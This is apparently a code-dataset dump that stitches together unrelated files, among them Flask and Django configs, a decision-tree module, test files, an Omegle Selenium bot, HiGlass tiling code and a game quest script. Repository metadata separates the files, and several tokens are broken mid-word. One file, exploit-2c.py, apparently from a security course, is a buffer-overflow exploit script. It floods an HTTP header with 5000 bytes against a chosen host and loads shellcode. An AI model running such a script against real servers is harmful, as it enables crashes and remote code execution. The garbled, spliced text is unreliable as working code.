# ***********************************
# Settings common to all environments
# ***********************************
# Application settings
APP_NAME = "Game Valet"
APP_SYSTEM_ERROR_SUBJECT_LINE = APP_NA
|
ME + " system error"
# Flask settings
CSRF_ENABLED = True
# Flask-User settings
USER_APP_NAME = APP_NAME
USER_ENABLE_CHANGE_PASSWORD = True # Allow users to change their password
USER_ENABLE_CHANGE_USERNAME = False # Allow users to change their username
USER_ENABLE_CONFIRM_EMAIL = True # Force u
|
sers to confirm their email
USER_ENABLE_FORGOT_PASSWORD = True # Allow users to reset their passwords
USER_ENABLE_EMAIL = True # Register with Email
USER_ENABLE_REGISTRATION = True # Allow new users to register
USER_ENABLE_RETYPE_PASSWORD = True # Prompt for `retype password` in:
USER_ENABLE_USERNAME = False # Register and Login with username
USER_AFTER_LOGIN_ENDPOINT = 'core.user_page'
USER_AFTER_LOGOUT_ENDPOINT = 'core.home_page'
|
dmschreiber/tapiriik
|
tapiriik/web/email.py
|
Python
|
apache-2.0
| 963 | 0.015576 |
from djan
|
go.template.loader import get_template
from django.template import Context
from django.core.mail import EmailMultiAltern
|
atives
from django.conf import settings
def generate_message_from_template(template, context):
context["STATIC_URL"] = settings.STATIC_URL
# Mandrill is set up to inline the CSS and generate a plaintext copy.
html_message = get_template(template).render(Context(context)).strip()
context["plaintext"] = True
plaintext_message = get_template(template).render(Context(context)).strip()
return html_message, plaintext_message
def send_email(recipient_list, subject, html_message, plaintext_message=None):
if type(recipient_list) is not list:
recipient_list = [recipient_list]
email = EmailMultiAlternatives(subject=subject, body=plaintext_message, from_email="tapiriik <mailer@tapiriik.com>", to=recipient_list, headers={"Reply-To": "contact@tapiriik.com"})
email.attach_alternative(html_message, "text/html")
email.send()
|
JNero/Machine-Learning-in-action
|
DicisionTree/trees.py
|
Python
|
apache-2.0
| 3,852 | 0.003375 |
import matplotlib.pyplot as plt
import operator
from math import log
import pickle
def calcShannonEnt(dataSet):
numEntries = len(dataSet)
labelCounts = {}
for fv in dataSet:
currentLabel = fv[-1]
if currentLabel not in labelCounts.keys():
labelCounts[currentLabel] = 0
labelCounts[currentLabel] += 1
shannonEnt = 0.0
for key in labelCounts:
prob = float(labelCounts[key]) / numEntries
shannonEnt -= prob * log(prob, 2)
return shannonEnt
def createDataSet():
dataSet = [[1, 1, 'yes'], [1, 1, 'yes'],
[1, 0, 'no'], [0, 1, 'no'], [0, 1, 'no']]
labels = ['no surfacing', 'flippers']
return dataSet, labels
def splitDataSet(dataSet, axis, value):
retDataSet = []
for featVec in dataSet:
if featVec[axis] == value:
reducedFeatVec = featVec[:axis]
reducedFeatVec.extend(featVec[axis + 1:])
retDataSet.append(reducedFeatVec)
return retDataSet
def chooseBestFeatureToSplit(dataSet):
numFeatures = len(dataSet[0]) - 1
baseEntropy = calcShannonEnt(dataSet)
bestInfoGain = 0.0
bestFeature = -1
for i in range(numFeatures):
featList = [example[i] for example in dataSet]
uniqueVals = set(featList)
newEntropy = 0.0
for value in uniqueVals:
subDataSet = splitDataSet(dataSet, i, value)
prob = len(subDataSet) / float(len(dataSet))
newEntropy += prob * calcShannonEnt(subDataSet)
infoGain = baseEntropy - newEntropy
if(infoGain > bestInfoGain):
bestInfoGain = infoGain
bestFeature = i
return bestFeature
def majorityCnt(classList):
classCount = {}
for vote in classList:
if vote not in classCount.keys():
classCount[vote] = 0
classCount[vote] += 1
sortedClassCount = sorted(
classCount.items(), key=operator.itemgetter(1), reverse=True)
return sortedClassCount[0][0]
def createTree(dataSet, labels):
classList = [example[-1] for example in dataSet]
# print('classList.count is :',classList.count(classList[0]))
# print('len(classList) is :',len(classList))
if classList.count(classList[0]) == len(classList):
return classList[0]
# print('len(dataSet[0] is :',len(dataSet[0]))
if len(dataSet[0]) == 1:
return majorityCnt(classList)
bestFeat = chooseBestFeatureToSplit(dataSet)
# print('bestFeat is : ',bestFeat)
bestFeatLabel = labels[bestFeat]
# print('bestFeatLabel is :',bestFeatLabel)
myTree = {bestFeatLabel: {}}
print
del(labels[bestFeat])
featValues = [example[bestFeat] for example in dataSet]
uniqueVals = set(featValues)
for v
|
alue in uniqueVals:
subLabels = labels[:]
myTree[bestFeatLabel][value] = createTree(
splitDataSet(dataSet, bestFeat, value), subLabels)
return myTree
def classify(in
|
putTree, featLabels, testVec):
firstStr = list(inputTree.keys())[0]
# print('firstStr is : ',firstStr)
secondDict = inputTree[firstStr]
# print('secondDict is :',secondDict)
featIndex = featLabels.index(firstStr)
# print('featIndex is :',featIndex)
# print(type(featIndex))
for key in secondDict.keys():
# print(key)
# print('testVec is :',testVec[featIndex])
# print(type(key))
# print(type(testVec[featIndex]))
if testVec[featIndex] == key:
if type(secondDict[key]).__name__ == 'dict':
classLabel = classify(secondDict[key], featLabels, testVec)
else:
classLabel = secondDict[key]
return classLabel
def storeTree(inputTree, filename):
fw = open(filename, 'wb')
pickle.dump(inputTree, fw)
fw.close()
def grabTree(filename):
fr = open(filename, 'rb')
return pickle.load(fr)
|
iohannez/gnuradio
|
gr-comedi/python/comedi/qa_comedi.py
|
Python
|
gpl-3.0
| 1,256 | 0.001592 |
#!/usr/bin/env python
#
# Copyright 2005,2007,2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; withou
|
t even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 0211
|
0-1301, USA.
#
from gnuradio import gr, gr_unittest, comedi
class test_comedi(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_000_nop(self):
"""Just see if we can import the module...
They may not have COMEDI library, etc. Don't try to run anything"""
pass
if __name__ == '__main__':
gr_unittest.run(test_comedi, "test_comedi.xml")
|
all-of-us/raw-data-repository
|
rdr_service/dao/resource_dao.py
|
Python
|
bsd-3-clause
| 2,900 | 0.001034 |
#
# This file is subject to the terms and conditions defined in the
# file 'LICENSE', which is part of this source code package.
#
from collections import OrderedDict
from sqlalchemy import inspect
from sqlalchemy.engine import ResultProxy
from rdr_service.dao.base_dao import UpsertableDao
from rdr_service.model.resource_data import ResourceData
from rdr_service.resource.fields import EnumString, EnumInteger
class ResourceDataDao(UpsertableDao):
def __init__(self, backup=False):
"""
:param backup: Use backup readonly database connection.
"""
super().__init__(ResourceData, backup=backup)
def to_resource_dict(self, obj, schema=None, result_proxy=None):
"""
Dump a sqlalchemy model or query result object to python dict.
:param obj: SqlAlchemy Query Result object or Row Proxy object.
:param schema: Resource schema object.
:param result_proxy: ResultProxy object if obj=RowProxy object.
:return: ordered dict
"""
if not obj:
return None
data = OrderedDict()
# Get the list of columns returned in the query.
if result_proxy and isinstance(result_proxy, ResultProxy): # this is a ResultProxy object
columns = list()
for column in result_proxy.cursor.description:
columns.append(column[0])
elif hasattr(obj, "_fields"): # This is a custom query result object.
columns = obj._fields
elif hasattr(obj, '_keymap'): # RowProxy
columns = obj._keymap
else:
mapper = inspect(obj) # Simple model object
columns = mapper.attrs
for column in columns:
key = str(column.key) if hasattr(column, "key") else column
if not isinstance(key, str):
# logging.warning('bad column key value [{0}], unable to lookup result column value.'.format(column))
continue
value = getattr(obj, key)
int_id_value = None
if schema:
# Check for Enum column type and convert to Enum if needed.
_field = schema.get_field(key)
if type(_field) == EnumString:
value = str(_field.enum(value))
_id_field = schema.get_field(key + '_id')
if _id_field and type(_id_field) == EnumInteger:
int_id_value = int(_field.enum(value))
elif type(_field
|
) == EnumInteger:
value = int(_field.enum(value))
data[key] = value
# Automatically generate an integer field for enum/string fields that have a paire
|
d _id integer field
# E.g.: status/status_id, code_type/code_type_id, etc.
if int_id_value:
data[key + '_id'] = int_id_value
return data
|
dschien/PyExcelModelingHelper
|
tests/test_DataSeriesLoader.py
|
Python
|
mit
| 3,547 | 0.003383 |
import unittest
from datetime import datetime
import numpy as np
import pandas as pd
from excel_helper.helper import DataSeriesLoader
class TestDataFrameWithCAGRCalculation(unittest.TestCase):
def test_simple_CAGR(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
res = dfl['static_one']
print (res)
assert res.loc[[datetime(2009, 1, 1)]][0] == 1
assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
def test_CAGR_ref_date_within_bounds(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
res = dfl['static_one']
assert res.loc[[datetime(2009, 1, 1)]][0] == 1
assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
def test_CAGR_ref_date_before_start(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
# equivalent to dfl['test_ref_date_before_start']
self.assertRaises(AssertionError, dfl.__getitem__, 'test_ref_date_before_start')
def test_CAGR_ref_date_after_end(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0
|
)
# equivalent to dfl['test_ref_date_before_start']
self.assertRaises(AssertionError, dfl.__getitem__, 'test_ref_date_after_end')
def test_simple_CAGR_from_pandas(sel
|
f):
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
xls = pd.ExcelFile('test.xlsx')
df = xls.parse('Sheet1')
ldr = DataSeriesLoader.from_dataframe(df, times, size=2)
res = ldr['static_one']
assert res.loc[[datetime(2009, 1, 1)]][0] == 1
assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
def test_simple_CAGR_mm(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2015-01-01', '2016-01-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
res = dfl['mm']
print(res)
# assert res.loc[[datetime(2009, 1, 1)]][0] == 1
# assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
if __name__ == '__main__':
unittest.main()
|
gmangavin/PyMegle
|
Other Py/PyMegleTwo.py
|
Python
|
mit
| 5,053 | 0.014843 |
'''
View the coding live on Twitch @ https://www.twitch.tv/gmangavin and look at the github @ https://github.com/gmangavin/PyWeb
chromedriver for gui view, phantomjs for ghost view.
'''
import selenium.webdriver #Imports module
import time #Imports time
import threading #Imports threading, used to have multiple things happen at the same time.
import os #Imports OS
N = False #Used for the bool loop.
whil
|
e N == False:
EngineChoice = input('Would you like a visual of the bot? (Y/N): ') #Part one for the web driver choice
YN = (EngineChoice.lower()) #Prevents capatalization error.
if YN == ('y'):
while N == False:
VarChoice = input('Would you like Fi
|
refox or Chrome? (F/C): ') #Part two for the web driver choice
FC = (VarChoice.lower()) #Prevents capatalization error.
if FC == ('f'):
try:
WebVar = selenium.webdriver.Firefox()
N = True
except selenium.common.exceptions.WebDriverException:
print("You don't seem to have the firefox webdriver installed. You can get it here https://github.com/mozilla/geckodriver/releases")
elif FC == ('c'):
try:
WebVar = selenium.webdriver.Chrome()
N = True
except:
print("You don't seem to have the chrome webdriver installed. You can get it here https://sites.google.com/a/chromium.org/chromedriver/downloads")
else:
print('Try again')
elif YN == ('n'):
try:
WebVar = selenium.webdriver.PhantomJS()
N = True
except selenium.common.exceptions.WebDriverException:
print("You don't seem to have the PhantomJS webdriver installed. You can get it here http://phantomjs.org/")
else:
print('Try again')
#A while loop to make sure the user enters in a correct character.
#Allows the user to choose which web driver they want to use.
Interest = input("What is a common interest you're looking for?: ")
WebVar.get('https://www.omegle.com')
print(WebVar.title)
WebVar.find_element_by_xpath('//*[@id="topicsettingscontainer"]/div/div[1]/span[2]').click() #Clicks the area for typing
Send = WebVar.find_element_by_class_name('newtopicinput') #Creates an input variable for text area.
Send.send_keys(Interest + ',') #Sends input to text area.
WebVar.find_element_by_xpath('//*[@id="textbtn"]').click() #Clicks the 'text' button
Disconnected = False
def Disconnect(*args):
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[2]/table/tbody/tr/td[1]/div/button').click()
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[2]/table/tbody/tr/td[1]/div/button').click()
global Disconnected
Disconnected = True
return Disconnected
def Change(*args):
if Disconnected == True:
os.system('cls')
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[1]/div[1]/div/div[4]/div/a').click()
Interest = input("What is a common interest you're looking for?: ")
Send2 = WebVar.find_element_by_class_name('topicplaceholder')
Send2.send_keys(Interest + ',') #Sends input to text area.
else:
print("You need to disconnect first")
def Connect(*args):
if Disconnected == True:
os.system('cls')
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[2]/table/tbody/tr/td[1]/div/button').click()
os.system('cls')
print('Rebooting search.')
threading.Thread(target=StatusMode)._stop()
threading.Thread(target=UserMode)._stop()
time.sleep(1)
threading.Thread(target=StatusMode).start()
os.system('cls')
elif Disconnected == False:
print("You're still connected.")
else:
print("something is just broken")
def UserMode(*args):
while True:
UserM = input('') #Has the user type an interest.
if UserM == "/end":
Disconnect()
elif UserM == "/start":
Connect()
elif UserM == "/change":
Change()
else:
Sending = WebVar.find_element_by_class_name('chatmsg') #Takes the class used for user input.
Sending.send_keys(UserM)
WebVar.find_element_by_class_name('sendbtn').click()
def StatusMode(*args):
threading.Thread(target=UserMode).start() #Starts the operation in a thread.
StatusNew = None #Create a variable with no value.
while True:
Status = WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[1]/div[1]/div').text #Takes the text info from xpath
if StatusNew == (Status):
continue
else:
StatusNew = Status
if "Stranger has disconnected." not in Status:
os.system('cls') #Refreshes chat.
print(StatusNew)
print('')
else:
Disconnect()
threading.Thread(target=StatusMode).start() #Starts the operation in a thread.
|
hms-dbmi/clodius
|
clodius/tiles/hitile.py
|
Python
|
mit
| 10,847 | 0.001106 |
import base64
import h5py
import math
import numpy as np
import os
import os.path as op
def array_to_hitile(
old_data, filename, zoom_step=8, chunks=(1e6,), agg_function=np.sum
):
"""
Downsample a dataset so that it's compatible with HiGlass (filetype: hitile, datatype: vector)
Parameters
----------
old_data: np.array
A numpy array containing the data to be downsampled
filename: string
The output filename where the resulting multi-resolution
data will be stored.
zoom_step: int
The number of zoom levels to skip when aggregating
"""
import dask.array as da
if op.exists(filename):
os.remove(filename)
f_new = h5py.File(filename, "w")
tile_size = 1024
max_pos = len(old_data)
# we store every n'th zoom level
zoom_factor = 2 ** zoom_step
max_zoom = math.ceil(math.log(max_pos / tile_size) / math.log(2))
meta = f_new.create_dataset("meta", (
|
1,), dtype="f")
meta.attrs["tile-size"] = tile_size
meta.attrs["zoom-step"] = zoom_step
meta.attrs["max-length"] = max_pos
meta.attrs["max-zoom"] = max_zoom
meta.attrs["max-width"] = tile_size * 2 ** max_zoom
min_data = da.from_array(old_data, chunks)
max_data = da.from_array(old_data, chunks)
old_data = da.from_array(old_data, chunks)
for z in range(0, max_zoom, zoom_step):
values_dset = f_new.require_dataset(
|
"values_" + str(z), (len(old_data),), dtype="f", compression="gzip"
)
mins_dset = f_new.require_dataset(
"mins_" + str(z), (len(old_data),), dtype="f", compression="gzip"
)
maxs_dset = f_new.require_dataset(
"maxs_" + str(z), (len(old_data),), dtype="f", compression="gzip"
)
da.store(old_data, values_dset)
da.store(min_data, mins_dset)
da.store(max_data, maxs_dset)
# f_new['values_' + str(z)][:] = old_data
# see if we need to pad the end of the dataset
# if so, use the previous last value
if len(old_data) % zoom_factor != 0:
old_data = da.concatenate(
(old_data, [old_data[-1]] * (zoom_factor - len(old_data) % zoom_factor))
)
min_data = da.concatenate(
(min_data, [max_data[-1]] * (zoom_factor - len(min_data) % zoom_factor))
)
max_data = da.concatenate(
(max_data, [max_data[-1]] * (zoom_factor - len(max_data) % zoom_factor))
)
# aggregate the data by summing adjacent datapoints
# sys.stdout.write('summing...')
# sys.stdout.flush()
# print("fdsdsfs:", math.ceil(len(old_data) / zoom_factor), zoom_factor)
# print("chunks:", chunks, zoom_factor, 'len:', len(old_data))
old_data = old_data.rechunk(chunks)
min_data = old_data.rechunk(chunks)
max_data = old_data.rechunk(chunks)
# print('zoom_factor', zoom_factor, old_data.shape)
old_data = da.coarsen(agg_function, old_data, {0: zoom_factor})
min_data = da.coarsen(np.min, max_data, {0: zoom_factor})
max_data = da.coarsen(np.max, max_data, {0: zoom_factor})
# reshape( (math.ceil(len(old_data) / zoom_factor), zoom_factor)).sum(axis=1)
# sys.stdout.write(' done\n')
# sys.stdout.flush()
"""
if len(old_data) < 10000:
plt.plot(old_data)
"""
# plt.plot(old_data)
f_new.close()
def aggregate(a, num_to_agg):
if len(a) % num_to_agg != 0:
a = np.concatenate((a, [a[-1]] * (num_to_agg - len(a) % num_to_agg)))
return a.reshape((math.ceil(len(a) / num_to_agg), num_to_agg)).sum(axis=1)
def aggregate_min(a, num_to_agg):
if len(a) % num_to_agg != 0:
a = np.concatenate((a, [a[-1]] * (num_to_agg - len(a) % num_to_agg)))
return a.reshape((math.ceil(len(a) / num_to_agg), num_to_agg)).min(axis=1)
def aggregate_max(a, num_to_agg):
if len(a) % num_to_agg != 0:
a = np.concatenate((a, [a[-1]] * (num_to_agg - len(a) % num_to_agg)))
return a.reshape((math.ceil(len(a) / num_to_agg), num_to_agg)).max(axis=1)
def get_data(hdf_file, z, x):
"""
Return a tile from an hdf_file.
:param hdf_file: A file handle for an HDF5 file (h5py.File('...'))
:param z: The zoom level
:param x: The x position of the tile
"""
# is the title within the range of possible tiles
if x > 2 ** z:
print("OUT OF RIGHT RANGE")
return ([], [], [])
if x < 0:
print("OUT OF LEFT RANGE")
return ([], [], [])
d = hdf_file["meta"]
tile_size = int(d.attrs["tile-size"])
zoom_step = int(d.attrs["zoom-step"])
max_zoom = int(d.attrs["max-zoom"])
max_width = tile_size * 2 ** max_zoom
if "max-position" in d.attrs:
max_position = int(d.attrs["max-position"])
else:
max_position = max_width
rz = max_zoom - z
# tile_width = max_width / 2**z
# because we only store some a subsection of the zoom levels
next_stored_zoom = zoom_step * math.floor(rz / zoom_step)
zoom_offset = rz - next_stored_zoom
# the number of entries to aggregate for each new value
num_to_agg = 2 ** zoom_offset
total_in_length = tile_size * num_to_agg
# which positions we need to retrieve in order to dynamically aggregate
start_pos = int((x * 2 ** zoom_offset * tile_size))
end_pos = int(start_pos + total_in_length)
# print("max_position:", max_position)
max_position = int(max_position / 2 ** next_stored_zoom)
# print("new max_position:", max_position)
# print("start_pos:", start_pos)
# print("end_pos:", end_pos)
# print("next_stored_zoom", next_stored_zoom)
# print("max_position:", int(max_position))
f = hdf_file["values_" + str(int(next_stored_zoom))]
f_min = hdf_file["mins_" + str(int(next_stored_zoom))]
f_max = hdf_file["maxs_" + str(int(next_stored_zoom))]
if start_pos > max_position:
# we want a tile that's after the last bit of data
a = np.zeros(end_pos - start_pos)
a.fill(np.nan)
a_min = np.zeros(end_pos - start_pos)
a_min.fill(np.nan)
# umm, I don't think this needs to be here since
# everything should be nan
ret_array = aggregate(a, int(num_to_agg))
min_array = aggregate_min(a_min, int(num_to_agg))
# In the line below, "a_max" is undefined, so this would not work:
# max_array = aggregate_max(a_max, int(num_to_agg))
elif start_pos < max_position and max_position < end_pos:
a = f[start_pos:end_pos][:]
a[max_position + 1 : end_pos] = np.nan
a_min = f_min[start_pos:end_pos][:]
a_min[max_position + 1 : end_pos] = np.nan
a_max = f_max[start_pos:end_pos][:]
a_max[max_position + 1 : end_pos] = np.nan
ret_array = aggregate(a, int(num_to_agg))
min_array = aggregate_min(a_min, int(num_to_agg))
max_array = aggregate_max(a_max, int(num_to_agg))
else:
ret_array = aggregate(f[start_pos:end_pos], int(num_to_agg))
min_array = aggregate_min(f_min[start_pos:end_pos], int(num_to_agg))
max_array = aggregate_max(f_max[start_pos:end_pos], int(num_to_agg))
# print("ret_array:", f[start_pos:end_pos])
# print('ret_array:', ret_array)
# print('nansum', np.nansum(ret_array))
# check to see if we counted the number of NaN values in the given
# interval
f_nan = None
if "nan_values_" + str(int(next_stored_zoom)) in hdf_file:
f_nan = hdf_file["nan_values_" + str(int(next_stored_zoom))]
nan_array = aggregate(f_nan[start_pos:end_pos], int(num_to_agg))
num_aggregated = 2 ** (max_zoom - z)
num_vals_array = np.zeros(len(nan_array))
num_vals_array.fill(num_aggregated)
num_summed_array = num_vals_array - nan_array
averages_array = ret_array / num_summed_array
return (averages_array, min_array, max_array)
return (ret_array, min_array, max_array)
def tileset_info(hitile_path):
"""
Get the tileset info for a hitile file.
Parameters
-----
|
eevee/cocos2d-mirror
|
test/test_spawn.py
|
Python
|
bsd-3-clause
| 1,024 | 0.030273 |
# This code is so you can run the samples without installing the package
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
#
testinfo = "s, t 5, s, t 10.1, s, t 10.2, s, q"
tags = "spawn, Reverse"
import cocos
from cocos.director import director
from cocos.actions import Rotate, Reverse, MoveBy, Delay
import pyglet
from cocos.sprite import Sprite
class TestLayer(cocos.layer.Layer):
def __init__(self):
super( TestLayer, self ).__init__()
x,y = director.get_window_size()
self.sprite = Sprite( 'grossini.png', (x/2, y/2) )
self.add( self.sprite )
self.sprite2 = Sprite( 'grossini.png', (x/2, y/4) )
self.add( self.sprite2 )
seq = Rotate( 360, 10 ) | MoveBy((x/2,0))
|
self.sprite.do( seq )
self.sprite
|
2.do( Reverse( seq ) )
def main():
director.init()
test_layer = TestLayer ()
main_scene = cocos.scene.Scene (test_layer)
director.run (main_scene)
if __name__ == '__main__':
main()
|
Coaxis-ASP/opt
|
backend/api/tests/factories.py
|
Python
|
gpl-3.0
| 1,150 | 0 |
import factory
from api import models
class ClientFactory(factory.DjangoModelFactory):
class Meta:
model = models.Client
name = 'Coaxis'
@factory.django.mute_signals(models.post_save)
class UserFactory(factory.DjangoModelFactory):
class Meta:
model = models.MyUser
email = factory.Sequence(lambda n: 'u{0}@coaxis.com'.format(n))
password = factory.PostGenerationMethodCall('set_password', 'password')
is_staff = False
class Employee
|
Factory(factory.DjangoModelFactory):
|
class Meta:
model = models.Employee
user = factory.SubFactory(UserFactory)
is_technician = False
@factory.post_generation
def clients(self, create, extracted, **kwargs):
if not create: # Simple build, do nothing.
return
if extracted: # A list of objects were passed in, use them
for client in extracted:
self.clients.add(client)
class TechnicianFactory(EmployeeFactory):
is_technician = True
class DaemonFactory(factory.DjangoModelFactory):
class Meta:
model = models.Daemon
client = factory.SubFactory(ClientFactory)
|
openaid-IATI/OIPA
|
OIPA/api/generics/views.py
|
Python
|
agpl-3.0
| 6,974 | 0.000143 |
import copy
from django.db.models.fields.related import ForeignKey, OneToOneField
from rest_framework import mixins
from rest_framework.generics import (
GenericAPIView, ListAPIView, ListCreateAPIView, RetrieveAPIView,
RetrieveUpdateDestroyAPIView
)
from api.generics.serializers import (
DynamicFieldsModelSerializer, DynamicFieldsSerializer
)
class DynamicView(GenericAPIView):
# foreign / one-to-one fields that can be used with select_related()
select_related_fields = []
serializer_fields = []
field_source_mapping = {}
fields = ()
selectable_fields = ()
def __init__(self, *args, **kwargs):
"""
Extract prefetches and default fields from Meta
"""
# TODO: move this to a meta class, to evaluate once when defining the
# class
# TODO: This is not efficient - 2016-01-20
serializer_class = self.get_serializer_class()
serializer = serializer_class() # need an instance to extract fields
model = serializer_class.Meta.model
assert issubclass(
serializer_class, DynamicFieldsModelSerializer
) or issubclass(serializer_class, DynamicFieldsSerializer), (
"serializer class must be an instance of \
DynamicFieldsModelSerializer " "instead got %s"
) % (serializer_class.__name__,)
self.serializer_fields = serializer.fields.keys()
self.select_related_fields = [
field.name for field in model._meta.fields
if isinstance(field, (ForeignKey, OneToOneField))
]
self.field_source_mapping = {
field.field_name: field.source
for field in serializer.fields.values()
if isinstance(
field, (ForeignKey, OneToOneField)
)
}
def _get_query_fields(self):
if not self.request:
return ()
request_fields = self.request.query_params.get('fields')
# if requested query fields is set to `all` we will return all
# serializer fields defined in serializer class. Here we assign
# `self.fields = ()` so that it will be assigned all serializer
# fields in `filter_queryset` method.
if request_fields and request_fields == 'all':
self.fields = ()
self.selectable_fields = (self.selectable_fields + tuple(
self.serializer_fields))
elif request_fields:
for request_field in request_fields.split(','):
if request_field not in list(self.fields):
# put selectable fields together with required fields
# defined in the class
self.fields = self.fields + (request_field,)
# just in case if you want to know which of fields
# we get as selectable field
self.selectable_fields = self.selectable_fields+(request_field,) # NOQA: E501
# Some bugs if request fields has 'aggregations'
# So we need to remove it from request fields.
# And assign a tuple fields without aggregations
|
fields = list(self.fields)
try:
fields.remove('aggregations')
except ValueError:
pass
# Assign it again
self.fields = tuple(fields)
return getattr(self, 'fields', ())
def filter_queryset(self, queryset, *args, **kwargs):
"""
Prefetches based on 'fields' GET arg
"""
filter_fields = copy.deepcopy(self.request.query_params)
if 'fields
|
' in filter_fields:
filter_fields.pop('fields')
if 'format' in filter_fields:
filter_fields.pop('format')
if 'page' in filter_fields:
filter_fields.pop('page')
if 'page_size' in filter_fields:
filter_fields.pop('page_size')
if 'ordering' in filter_fields:
filter_fields.pop('ordering')
if 'q'in filter_fields:
filter_fields.pop('q')
if 'q_fields' in filter_fields:
filter_fields.pop('q_fields')
for filter_field in filter_fields:
found = False
try:
declared_filters = self.filter_class.declared_filters
for key in declared_filters:
if filter_field == key:
found = True
if found is False:
# make error in the code to fail
# if input wrong filter name.
setattr(self, 'filter_class', 'No Filter Class')
break
except AttributeError:
pass
fields = self._get_query_fields(*args, **kwargs)
if not fields:
fields = self.serializer_fields
select_related_fields = list(set(
self.select_related_fields
) & set(fields))
if select_related_fields:
queryset = queryset.select_related(*select_related_fields)
for field in fields:
# TODO: Hook this up in the view - 2016-01-15
if hasattr(queryset, 'prefetch_%s' % field):
queryset = getattr(queryset, 'prefetch_%s' % field)()
queryset = super(DynamicView, self).filter_queryset(
queryset, *args, **kwargs
)
return queryset
def get_serializer(self, *args, **kwargs):
"""
Apply 'fields' to dynamic fields serializer
"""
fields = self._get_query_fields()
kwargs['context'] = self.get_serializer_context()
return super(DynamicView, self).get_serializer(
fields=fields, *args, **kwargs
)
class DynamicListView(DynamicView, ListAPIView):
"""
List view with dynamic properties
"""
class DynamicDetailView(DynamicView, RetrieveAPIView):
"""
List view with dynamic properties
"""
class DynamicListCRUDView(DynamicView, ListCreateAPIView):
"""
List view with dynamic properties
"""
class DynamicDetailCRUDView(DynamicView, RetrieveUpdateDestroyAPIView):
"""
List view with dynamic properties
"""
class SaveAllSerializer(mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
mixins.CreateModelMixin,
GenericAPIView):
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
|
nmahlangu/cs263-project-one
|
exploit-2c.py
|
Python
|
mit
| 1,279 | 0.016419 |
#!/usr/bin/python
import sys
import socket
import traceback
import urllib
import struct
def build_exploit(shellcode):
req = "GET / HTTP/1.0\r\n" + \
"Evil: {evil}\r\n" + \
"Host: birk105.studby.uio.no:81\r\n\r\n"
# 536 is first address that causes the server to not return a valid response
req = req.replace("{evil}","".join(['a' for i in xrange(5000)]))
return req
def send_req(host, port, req):
sock =
|
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to %s:%d..." % (host, port))
sock.connect((host, port))
print("Connected, sending request...")
sock.send(req)
print("Request sent, waiting for reply...")
rbuf = sock.recv(1024)
resp = ""
while len(rbuf):
resp = resp + rbuf
rbuf = sock.recv(1024)
print("Received reply.")
sock.close()
return resp
# execute request
|
if len(sys.argv) != 3:
print("Usage: " + sys.argv[0] + " host port")
exit()
try:
shellfile = open("shellcode.bin", "r")
shellcode = shellfile.read()
req = build_exploit(shellcode)
print("HTTP request:")
print(req)
resp = send_req(sys.argv[1], int(sys.argv[2]), req)
print("HTTP response:")
print(resp)
except:
print("Exception:")
print(traceback.format_exc())
|
zenn1989/scoria-interlude
|
L2Jscoria-Game/data/scripts/quests/269_InventionAmbition/__init__.py
|
Python
|
gpl-3.0
| 2,003 | 0.044433 |
# Rewritten by RayzoR
import sys
from com.l2scoria.gameserver.model.quest import State
from com.l2scoria.gameserver.model.quest import QuestState
from com.l2scoria.gameserver.model.quest.jython import QuestJython as JQuest
qn = "269_InventionAmbition"
class Quest (JQuest) :
def __init__(self,id,name,descr):
JQuest.__init__(self,id,name,descr)
self.questItemIds = [10866]
def onEvent (self,event,st) :
htmltext = event
if event == "32486-03.htm" :
